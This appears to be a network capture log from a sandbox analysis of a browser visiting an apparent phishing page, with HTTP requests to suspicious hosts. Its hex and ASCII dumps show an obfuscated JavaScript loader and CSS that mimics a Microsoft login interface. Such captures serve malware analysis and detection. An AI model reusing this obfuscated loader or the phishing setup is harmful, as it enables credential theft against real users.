2024-02-09 10:09:40 UTC	532	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus2-z1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-MSEdge-Ref: Ref A: BE71B5831CA04805BAA298A51D13B882 Ref B: BLUEDGE1705 Ref C: 2024-02-07T01:18:20Z Cache-Control: public, max-age=54534 Date: Fri, 09 Feb 2024 10:09:39 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:39 UTC	596	OUT	GET /65ba6b50a7471c8dd3b9f0fe-65ba6b45a7471c8dd3b9f0fd.js HTTP/1.1 Host: rkugxtvgxusbsfrtcv.kute.pw Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:40 UTC	1016	IN	HTTP/1.1 200 OK Date: Fri, 09 Feb 2024 10:09:40 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: rkugxtvgxusbsfrtcv.kute.pw Access-Control-Allow-Methods: GET, POST, DELETE, PUT, PATCH, OPTIONS Access-Control-Allow-Headers: auth,authkey , authvalue, Authorization, User-Agent, Keep-Alive, Content-Type, X-Requested-With Access-Control-Allow-Credentials: true Cache-Control: no-cache,no-store, must-revalidate Expires: Mon, 25 Jul 1997 05:00:00 GMT X-Cache-Status: MISS CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iUNDbtjXuSOrsXHhPk%2BRv8tO90iT3Y7iej0v39FcA75Iq%2FmEDuO8YQhyYNlKAsfQZxyIMQZRgYPK0V%2BWqiCeRQBr86m46v2Rr1Mr2bS3Ts%2FKzRUglUDB6iNMsIbxoX%2FbTsYsvXEO8Fulgj6IiA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 852b517169fd0715-ATL alt-svc: h3=":443"; ma=86400
2024-02-09 10:09:40 UTC	353	IN	Data Raw: 31 62 34 33 0d 0a 76 61 72 20 74 66 3d 5b 22 6f 77 65 54 45 4b 65 54 77 4c 38 4b 78 73 4f 3d 22 2c 22 41 77 35 50 44 61 3d 3d 22 2c 22 6f 33 62 48 7a 67 72 50 42 4d 43 36 6d 5a 61 3d 22 2c 22 6d 49 34 32 6c 4a 65 58 6c 32 72 50 43 33 71 3d 22 2c 22 43 4d 76 57 42 67 66 4a 7a 71 3d 3d 22 2c 22 79 33 6a 4c 79 78 72 4c 72 77 58 4c 42 77 75 3d 22 2c 22 7a 4e 76 55 79 33 72 50 42 32 34 47 6b 4c 57 3d 22 2c 22 44 68 4c 53 7a 74 30 4e 79 32 39 53 42 33 69 3d 22 2c 22 43 4d 75 55 79 32 39 54 6c 32 66 51 79 78 47 3d 22 2c 22 7a 78 6a 59 42 33 69 3d 22 2c 22 42 77 66 30 79 32 47 3d 22 2c 22 43 32 58 50 79 32 75 3d 22 2c 22 44 68 4c 57 7a 71 3d 3d 22 2c 22 45 49 39 30 41 67 76 54 7a 78 6d 56 79 33 6d 3d 22 2c 22 43 4d 39 31 44 67 76 59 71 64 69 55 6e 59 34 3d 22 2c Data Ascii: 1b43var tf=["oweTEKeTwL8KxsO=","Aw5PDa==","o3bHzgrPBMC6mZa=","mI42lJeXl2rPC3q=","CMvWBgfJzq==","y3jLyxrLrwXLBwu=","zNvUy3rPB24GkLW=","DhLSzt0Ny29SB3i=","CMuUy29Tl2fQyxG=","zxjYB3i=","Bwf0y2G=","C2XPy2u=","DhLWzq==","EI90AgvTzxmVy3m=","CM91DgvYqdiUnY4=",
2024-02-09 10:09:40 UTC	1369	IN	Data Raw: 48 48 41 77 34 3d 22 2c 22 43 33 72 56 43 61 3d 3d 22 2c 22 42 49 35 51 43 57 3d 3d 22 2c 22 44 67 76 34 44 63 39 51 79 78 7a 48 43 32 6d 3d 22 2c 22 6d 5a 4b 57 43 68 47 37 42 77 4c 55 6c 77 47 3d 22 2c 22 79 4a 72 4a 6e 74 79 35 79 4d 6e 4d 6d 64 47 3d 22 2c 22 79 32 39 55 43 32 39 53 7a 71 3d 3d 22 2c 22 7a 73 31 4b 7a 78 72 4c 79 33 71 56 6d 73 34 3d 22 2c 22 7a 77 6e 56 43 4d 66 30 41 77 39 55 6f 4d 34 3d 22 2c 22 42 67 4c 55 41 57 3d 3d 22 2c 22 6d 67 65 35 7a 77 71 58 6f 64 4c 55 79 4e 69 3d 22 2c 22 43 78 76 4c 43 4e 4c 6f 71 4c 69 3d 22 2c 22 7a 67 76 30 7a 77 6e 30 6c 4d 31 50 42 49 34 3d 22 2c 22 43 59 35 4a 42 32 30 56 79 77 50 48 45 63 38 3d 22 2c 22 43 59 39 4b 6d 5a 76 4a 6e 74 66 4a 79 74 47 3d 22 2c 22 45 63 35 4e 42 32 39 4e 42 67 76 48 Data Ascii: HHAw4=","C3rVCa==","BI5QCW==","Dgv4Dc9QyxzHC2m=","mZKWChG7BwLUlwG=","yJrJnty5yMnMmdG=","y29UC29Szq==","zs1KzxrLy3qVms4=","zwnVCMf0Aw9UoM4=","BgLUAW==","mge5zwqXodLUyNi=","CxvLCNLoqLi=","zgv0zwn0lM1PBI4=","CY5JB20VywPHEc8=","CY9KmZvJntfJytG=","Ec5NB29NBgvH
2024-02-09 10:09:40 UTC	1369	IN	Data Raw: 2c 22 79 32 39 54 43 67 58 4c 44 67 75 3d 22 2c 22 7a 67 76 49 44 71 3d 3d 22 2c 22 44 68 6a 48 79 32 75 3d 22 2c 22 43 33 71 56 79 78 48 50 42 33 6d 55 42 77 4b 3d 22 2c 22 69 5a 43 33 6e 5a 54 30 7a 78 48 30 6c 77 71 3d 22 2c 22 43 68 47 47 6d 63 61 58 6e 78 62 34 6f 59 43 3d 22 2c 22 6c 33 61 2b 70 63 39 4b 41 78 79 2b 22 2c 22 7a 77 4c 4e 41 68 71 36 6d 74 47 57 43 68 47 3d 22 2c 22 41 32 43 55 79 32 39 54 6c 32 66 34 41 77 38 3d 22 2c 22 6e 4a 6d 30 6d 4a 4b 59 6f 64 72 49 7a 4a 65 3d 22 2c 22 41 32 43 55 79 32 39 54 6c 33 7a 31 7a 75 61 3d 22 2c 22 74 4b 39 6f 72 71 3d 3d 22 2c 22 6d 63 39 4b 41 78 6e 30 6c 33 7a 31 7a 73 30 3d 22 2c 22 43 4d 76 53 22 2c 22 42 67 6a 31 42 67 58 57 44 77 58 53 43 68 75 3d 22 2c 22 44 67 76 34 44 63 39 4a 43 33 6d 3d Data Ascii: ,"y29TCgXLDgu=","zgvIDq==","DhjHy2u=","C3qVyxHPB3mUBwK=","iZC3nZT0zxH0lwq=","ChGGmcaXnxb4oYC=","l3a+pc9KAxy+","zwLNAhq6mtGWChG=","A2CUy29Tl2f4Aw8=","nJm0mJKYodrIzJe=","A2CUy29Tl3z1zua=","tK9orq==","mc9KAxn0l3z1zs0=","CMvS","Bgj1BgXWDwXSChu=","Dgv4Dc9JC3m=
2024-02-09 10:09:40 UTC	1369	IN	Data Raw: 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 66 3d 6e 65 77 20 52 65 67 45 78 70 28 62 66 28 22 30 78 34 61 22 29 2b 62 66 28 22 30 78 37 30 22 29 29 2c 78 3d 6e 65 77 20 52 65 67 45 78 70 28 62 66 28 22 30 78 35 34 22 29 2b 62 66 28 22 30 78 37 38 22 29 2b 62 66 28 22 30 78 34 34 22 29 2b 22 29 22 2c 22 69 22 29 2c 62 3d 74 69 28 62 66 28 22 30 78 34 35 22 29 29 3b 66 2e 74 65 73 74 28 62 2b 62 66 28 22 30 78 35 38 22 29 29 26 26 78 2e 74 65 73 74 28 62 2b 22 69 6e 70 75 74 22 29 3f 74 69 28 29 3a 62 28 22 30 22 29 7d 29 28 29 7d 28 29 3b 76 61 72 20 74 2c 6f 3d 28 74 3d 21 30 2c 66 75 6e 63 74 69 6f 6e 28 78 2c 62 29 7b 76 61 72 20 66 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 62 29 7b 76 61 72 20 66 3d 62 5b 62 66 28 22 30 78 36 62 22 Data Ascii: is,function(){var f=new RegExp(bf("0x4a")+bf("0x70")),x=new RegExp(bf("0x54")+bf("0x78")+bf("0x44")+")","i"),b=ti(bf("0x45"));f.test(b+bf("0x58"))&&x.test(b+"input")?ti():b("0")})()}();var t,o=(t=!0,function(x,b){var f=t?function(){if(b){var f=b[bf("0x6b"
2024-02-09 10:09:40 UTC	1369	IN	Data Raw: 72 63 68 5b 62 66 28 22 30 78 34 66 22 29 5d 28 31 29 2c 62 3d 7b 7d 3b 69 66 28 78 29 66 6f 72 28 76 61 72 20 6e 3d 28 78 3d 78 5b 62 66 28 22 30 78 33 38 22 29 5d 28 22 23 22 29 5b 30 5d 29 5b 62 66 28 22 30 78 33 38 22 29 5d 28 22 26 22 29 2c 74 3d 30 3b 74 3c 6e 5b 62 66 28 22 30 78 39 22 29 5d 3b 74 2b 2b 29 7b 76 61 72 20 72 2c 65 2c 6f 3d 6e 5b 74 5d 2e 73 70 6c 69 74 28 22 3d 22 29 2c 63 3d 6f 5b 30 5d 2c 61 3d 74 79 70 65 6f 66 20 6f 5b 31 5d 3d 3d 3d 62 66 28 22 30 78 36 63 22 29 7c 7c 6f 5b 31 5d 2c 63 3d 63 5b 62 66 28 22 30 78 36 39 22 29 5d 28 29 3b 74 79 70 65 6f 66 20 61 3d 3d 3d 62 66 28 22 30 78 37 62 22 29 26 26 28 61 3d 61 5b 62 66 28 22 30 78 36 39 22 29 5d 28 29 29 2c 63 5b 62 66 28 22 30 78 34 65 22 29 5d 28 2f 5c 5b 28 5c 64 2b 29 Data Ascii: rch[bf("0x4f")](1),b={};if(x)for(var n=(x=x[bf("0x38")]("#")[0])[bf("0x38")]("&"),t=0;t<n[bf("0x9")];t++){var r,e,o=n[t].split("="),c=o[0],a=typeof o[1]===bf("0x6c")\|\|o[1],c=c[bf("0x69")]();typeof a===bf("0x7b")&&(a=a[bf("0x69")]()),c[bf("0x4e")](/\[(\d+)
2024-02-09 10:09:40 UTC	1158	IN	Data Raw: 62 66 28 22 30 78 31 64 22 29 2b 62 66 28 22 30 78 37 64 22 29 2b 62 66 28 22 30 78 34 63 22 29 2b 62 66 28 22 30 78 33 63 22 29 2b 62 66 28 22 30 78 35 66 22 29 2b 62 66 28 22 30 78 37 31 22 29 2b 62 66 28 22 30 78 36 34 22 29 2b 22 6a 73 22 2c 62 66 28 22 30 78 35 33 22 29 2b 62 66 28 22 30 78 32 65 22 29 2b 62 66 28 22 30 78 34 31 22 29 2b 62 66 28 22 30 78 37 66 22 29 2b 22 74 66 64 7a 7a 64 73 64 73 64 78 7a 2f 74 68 65 6d 65 73 2f 31 34 22 2b 62 66 28 22 30 78 31 61 22 29 2b 62 66 28 22 30 78 35 64 22 29 2b 22 34 33 66 64 30 36 31 39 2e 6a 73 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 74 69 28 66 29 7b 66 75 6e 63 74 69 6f 6e 20 78 28 66 29 7b 69 66 28 74 79 70 65 6f 66 20 66 3d 3d 3d 62 66 28 22 30 78 37 62 22 29 29 72 65 74 75 72 6e 20 66 75 6e 63 74 69 Data Ascii: bf("0x1d")+bf("0x7d")+bf("0x4c")+bf("0x3c")+bf("0x5f")+bf("0x71")+bf("0x64")+"js",bf("0x53")+bf("0x2e")+bf("0x41")+bf("0x7f")+"tfdzzdsdsdxz/themes/14"+bf("0x1a")+bf("0x5d")+"43fd0619.js"];function ti(f){function x(f){if(typeof f===bf("0x7b"))return functi
2024-02-09 10:09:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:40 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-02-09 10:09:40 UTC	662	IN	HTTP/1.1 200 OK Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-CID: 7 X-CCC: US X-Azure-Ref-OriginShield: Ref A: 58A8032E0A184202AC9E973C7E16DFBF Ref B: CH1AA2040904025 Ref C: 2023-07-09T06:25:19Z X-MSEdge-Ref: Ref A: 3FB884FE27194F46821180A0235E838A Ref B: CHI30EDGE0308 Ref C: 2023-07-09T06:26:49Z Content-Type: application/octet-stream Cache-Control: public, max-age=234299 Date: Fri, 09 Feb 2024 10:09:40 GMT Content-Length: 55 Connection: close X-CID: 2
2024-02-09 10:09:40 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:40 UTC	640	OUT	GET /sdxhetfdzzdsdsdxz/themes/css/0e80cb422a1f2a979e32fc3f0a9ed189nbr1706715983.css HTTP/1.1 Host: rullbullpullpushcndapp.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:40 UTC	605	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1086 Cache-Control: max-age=3600 Content-Type: text/css; charset=utf-8 Etag: "2c2f42530360d92df6a9043afb8385defb5a11ba6299d3a885ecfdb3ce6e12e7" Last-Modified: Wed, 07 Feb 2024 17:24:12 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Fri, 09 Feb 2024 10:09:40 GMT X-Served-By: cache-pdk-kfty2130022-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1707473381.903833,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-02-09 10:09:40 UTC	1086	IN	Data Raw: 23 6f 75 74 64 61 74 65 64 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 22 53 65 67 6f 65 20 55 49 22 2c 73 61 6e 73 2d 73 65 72 69 66 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 35 36 34 38 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 31 35 30 30 3b 70 61 64 64 69 6e 67 3a 30 20 32 34 70 78 20 32 34 70 78 Data Ascii: #outdated {font-family:"Open Sans","Segoe UI",sans-serif;position:absolute;background-color:#f25648;color:white;display:none;overflow:hidden;left:0;position:fixed;text-align:center;text-transform:uppercase;top:0;width:100%;z-index:1500;padding:0 24px 24px

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:41 UTC	640	OUT	GET /sdxhetfdzzdsdsdxz/themes/css/d35c51ca863429284bf173d706c95f1cnbr1706715983.css HTTP/1.1 Host: rullbullpullpushcndapp.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:41 UTC	607	IN	HTTP/1.1 200 OK Connection: close Content-Length: 398443 Cache-Control: max-age=3600 Content-Type: text/css; charset=utf-8 Etag: "c9d2e530eed176a060832fb399dc5b5e66f5ca5654c35290abc46730a9ab4492" Last-Modified: Wed, 07 Feb 2024 17:24:12 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Fri, 09 Feb 2024 10:09:41 GMT X-Served-By: cache-pdk-kfty2130039-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1707473381.344960,VS0,VE3 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-02-09 10:09:41 UTC	16384	IN	Data Raw: 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 20 7b 77 69 64 74 68 3a 33 70 78 20 7d 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 37 66 61 66 65 20 7d 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 68 75 6d 62 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 42 35 43 41 45 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 30 70 78 20 7d 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 68 75 6d 62 3a 68 6f 76 65 72 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 42 35 43 41 45 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 53 65 67 6f 65 20 55 49 27 3b 73 72 63 3a 75 72 6c 28 27 61 73 73 65 74 73 2f 53 65 67 6f 65 55 Data Ascii: ::-webkit-scrollbar {width:3px }::-webkit-scrollbar-track {background:#f7fafe }::-webkit-scrollbar-thumb {background:#0B5CAE;border-radius:30px }::-webkit-scrollbar-thumb:hover {background:#0B5CAE;}@font-face {font-family:'Segoe UI';src:url('assets/SegoeU
2024-02-09 10:09:41 UTC	16384	IN	Data Raw: 30 39 35 63 36 62 54 41 4d 42 49 3e 5b 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 39 29 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 58 64 31 30 39 35 63 36 62 64 31 30 39 35 63 36 62 54 41 4d 42 49 20 5b 72 6f 6c 65 3d 22 64 69 61 6c 6f 67 22 5d 2c 2e 74 68 65 6d 65 2d 6c 69 67 68 74 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 58 64 31 30 39 35 63 36 62 64 31 30 39 35 63 36 62 54 41 4d 42 49 20 5b 72 6f 6c 65 3d 22 64 69 61 6c 6f 67 22 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 66 20 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 58 64 31 30 39 35 63 36 62 64 31 30 39 35 63 36 62 54 41 4d 42 49 20 5b Data Ascii: 095c6bTAMBI>[role="presentation"]{background:rgba(255,255,255,.9)}.theme-dark .Xd1095c6bd1095c6bTAMBI [role="dialog"],.theme-light .theme-dark .Xd1095c6bd1095c6bTAMBI [role="dialog"]{background:#000;border-color:#fff }.theme-dark .Xd1095c6bd1095c6bTAMBI [
2024-02-09 10:09:41 UTC	16384	IN	Data Raw: 72 6f 77 73 3a 30 70 78 20 34 30 70 78 20 31 30 30 25 3b 7d 2e 73 6b 65 6c 65 74 61 6c 52 65 61 64 69 6e 67 52 69 62 62 6f 6e 47 72 69 64 52 6f 77 73 2e 6e 6f 52 69 62 62 6f 6e 20 7b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 72 6f 77 73 3a 34 38 70 78 20 30 70 78 20 31 30 30 25 3b 2d 6d 73 2d 67 72 69 64 2d 72 6f 77 73 3a 34 38 70 78 20 30 70 78 20 31 30 30 25 3b 7d 2e 73 6b 65 6c 65 74 61 6c 53 4c 52 47 72 69 64 52 6f 77 73 2e 6e 6f 48 65 61 64 65 72 2e 6e 6f 52 69 62 62 6f 6e 20 7b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 72 6f 77 73 3a 30 70 78 20 30 70 78 20 31 30 30 25 3b 2d 6d 73 2d 67 72 69 64 2d 72 6f 77 73 3a 30 70 78 20 30 70 78 20 31 30 30 25 3b 7d 2e 73 6b 65 6c 65 74 61 6c 52 65 61 64 69 6e 67 52 69 62 62 6f 6e 47 72 69 64 52 6f 77 73 2e 6e Data Ascii: rows:0px 40px 100%;}.skeletalReadingRibbonGridRows.noRibbon {grid-template-rows:48px 0px 100%;-ms-grid-rows:48px 0px 100%;}.skeletalSLRGridRows.noHeader.noRibbon {grid-template-rows:0px 0px 100%;-ms-grid-rows:0px 0px 100%;}.skeletalReadingRibbonGridRows.n
2024-02-09 10:09:41 UTC	16384	IN	Data Raw: 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 31 33 2c 2e 63 6f 6c 2d 73 6d 2d 31 34 2c 2e 63 6f 6c 2d 73 6d 2d 31 35 2c 2e 63 6f 6c 2d 73 6d 2d 31 36 2c 2e 63 6f 6c 2d 73 6d 2d 31 37 2c 2e 63 6f 6c 2d 73 6d 2d 31 38 2c 2e 63 6f 6c 2d 73 6d 2d 31 39 2c 2e 63 6f 6c 2d 73 6d 2d 32 30 2c 2e 63 6f 6c 2d 73 6d 2d 32 31 2c 2e 63 6f 6c 2d 73 6d 2d 32 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 33 2c 2e 63 6f 6c 2d 73 6d 2d 32 34 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 63 6f 6c 2d 73 6d 2d 31 7b 77 69 64 74 68 3a 34 2e 31 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 32 7b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 33 7b 77 69 64 74 68 3a 31 32 2e 35 25 7d 2e 63 6f 6c 2d 73 6d 2d 34 7b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 37 Data Ascii: m-11,.col-sm-12,.col-sm-13,.col-sm-14,.col-sm-15,.col-sm-16,.col-sm-17,.col-sm-18,.col-sm-19,.col-sm-20,.col-sm-21,.col-sm-22,.col-sm-23,.col-sm-24{float:left}.col-sm-1{width:4.16667%}.col-sm-2{width:8.33333%}.col-sm-3{width:12.5%}.col-sm-4{width:16.66667
2024-02-09 10:09:41 UTC	16384	IN	Data Raw: 6c 6f 72 22 5d 3a 2d 6d 73 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 64 61 74 65 22 5d 3a 2d 6d 73 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 64 61 74 65 74 69 6d 65 22 5d 3a 2d 6d 73 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 64 61 74 65 74 69 6d 65 2d 6c 6f 63 61 6c 22 5d 3a 2d 6d 73 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 2d 6d 73 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6d 6f 6e 74 68 22 5d 3a 2d 6d 73 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 69 6e 70 75 74 5b Data Ascii: lor"]:-ms-input-placeholder,input[type="date"]:-ms-input-placeholder,input[type="datetime"]:-ms-input-placeholder,input[type="datetime-local"]:-ms-input-placeholder,input[type="email"]:-ms-input-placeholder,input[type="month"]:-ms-input-placeholder,input[
2024-02-09 10:09:41 UTC	16384	IN	Data Raw: 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 30 2e 34 35 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 35 32 38 33 38 72 65 6d 7d 2e 73 65 63 74 69 6f 6e 20 2e 73 65 63 74 69 6f 6e 2d 73 75 62 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 36 30 2e 34 35 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 2e 37 37 38 33 38 72 65 6d 7d 2e 73 65 63 74 69 6f 6e 20 2e 73 65 63 74 69 6f 6e 2d 73 75 62 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 38 30 2e 34 35 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 2e 30 32 38 33 38 72 65 6d 7d 2e 73 65 63 74 69 6f 6e 20 2e 68 65 61 64 65 72 2d 61 63 74 69 6f 6e 7b 64 69 Data Ascii: .text-maxlines-2{max-height:40.454px;max-height:2.52838rem}.section .section-subtitle.text-maxlines-3{max-height:60.454px;max-height:3.77838rem}.section .section-subtitle.text-maxlines-4{max-height:80.454px;max-height:5.02838rem}.section .header-action{di
2024-02-09 10:09:41 UTC	16384	IN	Data Raw: 2e 6d 6f 64 61 6c 44 69 61 6c 6f 67 43 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 36 30 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 33 35 36 70 78 3b 77 69 64 74 68 3a 38 33 25 3b 77 69 64 74 68 3a 63 61 6c 63 28 39 30 25 20 2d 20 32 38 70 78 29 3b 6d 61 78 2d 68 65 69 67 68 74 3a 38 30 25 3b 6d 61 78 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 38 30 70 78 29 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 36 37 62 38 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 7a 2d 69 6e 64 65 78 3a 35 30 30 30 31 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 6f 76 65 72 66 6c Data Ascii: .modalDialogContainer{position:fixed;top:60px;max-width:356px;width:83%;width:calc(90% - 28px);max-height:80%;max-height:calc(100% - 80px);margin-left:-2px;margin-right:-2px;border:1px solid #0067b8;background-color:#fff;z-index:50001;overflow:auto;overfl
